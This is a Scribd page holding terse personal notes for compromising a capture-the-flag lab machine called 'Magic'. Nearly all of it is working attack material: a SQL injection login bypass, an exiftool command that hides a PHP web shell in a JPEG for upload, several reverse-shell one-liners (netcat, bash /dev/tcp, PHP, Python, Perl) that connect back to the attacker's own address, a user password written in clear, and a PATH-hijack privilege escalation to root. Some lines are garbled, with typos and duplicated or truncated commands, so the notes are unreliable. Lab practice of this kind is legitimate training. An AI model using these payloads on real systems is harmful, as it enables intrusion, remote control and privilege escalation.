Scribd Logo
Upload

Welcome to Scribd!

  • Magic

    Uploaded by

    Jean Pierre
    38 views2 pages

    Original Title

    magic

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    38 views2 pages

    Magic

    Uploaded by

    Jean Pierre

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    10.10.10.

    185 - Machine IP
    //login credits

    ' OR 1=1 -- //uss/pwd

    //10.10.14.106 = LHOST (ip v4 from ifconfig tun0)

    /Method1
    upload the shell.php.jpg
    /Method2

    Download a simple .jpeg image.

    1) exiftool -DocumentName="<h1>Enoxx<br><?php if(isset(\$_REQUEST['cmd'])){echo


    '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo
    '</pre>';}__halt_compiler();?></h1>" image.jpeg

    2) Rename and upload as image.php.jpeg

    nc -e /bin/sh 10.10.14.106 3234


    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.106 3234 >/tmp/f
    bash -i >& /dev/tcp/10.10.14.125/3234 0>&1

    //Payloads

    php -r '$sock=fsockopen("10.10.14.106",3234);exec("/bin/sh -i <&3 >&3 2>&3"


    python3 -c 'import
    socket,subprocess,os;s=socket.socket(soc7ket.AF_INET,socket.SOCK_STREAM);s.connect(
    ("10.10.14.106",3234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    perl -e 'use Socket;$i="10.10.14.106";
    $p=3234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_i
    n($p,inet_aton($i))))
    {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    //or python (for 2.x version)


    python3 -c 'import pty; pty.spawn("/bin/sh")'

    As user theseus
    //su theseus

    Th3s3usW4sK1ng

    /method 1

    //host python2 server


    python2 -m SimpleHTTPServer 8080

    on the target machine we have: wget "http://10.10.14.125:8080/lsw"


    where lsw is your above payload on the host machine (our kali or whatev distro)
    cd ubo
    chmod 777 lshw
    export PATH=/tmp/ubo:$PATH export PATH=/tmp/ubo:$PATH
    ./sysinfo
    /also works with method 2

    cd /tmp
    echo "/bin/bash" > lshw
    export PATH=/tmp/ubo:$PATH export PATH=/tmp/ubo:$PATH
    echo $PATH
    export PATH=/tmp:$PATH
    cd /bin
    ./sysinfo

    afterwards, back to the ... now root shell and run

    python3 -c 'import
    socket,subprocess,os;s=socket.socket(soc7ket.AF_INET,socket.SOCK_STREAM);s.connect(
    ("10.10.14.106",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    //listener for both methods
    as above, open a listener on 7777 and spawn a shell

    You might also like